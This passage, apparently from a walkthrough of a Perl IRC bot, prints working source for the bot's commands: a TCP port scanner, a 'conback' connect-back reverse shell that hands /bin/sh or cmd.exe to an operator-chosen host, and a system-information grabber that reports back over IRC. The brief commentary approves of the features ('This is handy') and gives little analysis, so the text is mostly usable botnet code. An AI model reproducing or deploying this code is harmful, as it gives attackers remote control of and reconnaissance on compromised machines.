There are a few more things that are worth looking at.
if ($funcarg =~ /^portscan (.*)/) { my $hostip="$1"; my @portas=("21","22","23","25","53","59","79","80","110","113","135","139","443","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); my (@aberta, %porta_banner); foreach my $porta (@portas) { my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4); if ($scansock) { push (@aberta, $porta); $scansock->close; } }
We can do some port scans and grab some banners.
Here is the section for the connect-back shell, /bin/sh or cmd.exe.
# Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) { my $host = "$1"; my $porta = "$2"; sendraw($IRC_cur_socket, "PRIVMSG $printl :02Conectando-se em02: $host:$porta"); my $proto = getprotobyname('tcp'); my $iaddr = inet_aton($host); my $paddr = sockaddr_in($porta, $iaddr); my $shell = "/bin/sh -i"; if ($^O eq "MSWin32") { $shell = "cmd.exe"; } socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; connect(SOCKET, $paddr) or die "connect: $!"; open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system("$shell"); close(STDIN); close(STDOUT); close(STDERR); }
This is handy.
elsif ($funcarg =~ /^info/) { my $sysos = `uname -sr`; my $uptime = `uptime`; if ( $sysos =~ /freebsd/i ) { $sysname = `hostname`; $memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`; $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`; chomp($memory); chomp($swap); } elsif ( $sysos =~ /linux/i ) { $sysname = `hostname -f`; $memory = `free -m |grep -i mem | awk '{print \$2}'`; $swap = `free -m |grep -i swap | awk '{print \$2}'`; chomp($swap); chomp($memory); } else { $sysname ="Not Found";; $memory ="Not found"; $swap ="Not Found"; } sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 SysInfo ^C3] ^C15-------------"); sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01os/host^C15^B;^B^C01 $sysos - $sysname "); sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01proc/PID^C15^B;^B^C01 $processo - $$"); sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01uptime^C15^B;^B^C01 $uptime"); sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01memory/swap^C15^B;^B^C01 $memory - $swap"); sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01perl/bot^C15^B;^B^C01 $] - $VERSAO"); sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 /SysInfo ^C3] ^C15------------"); }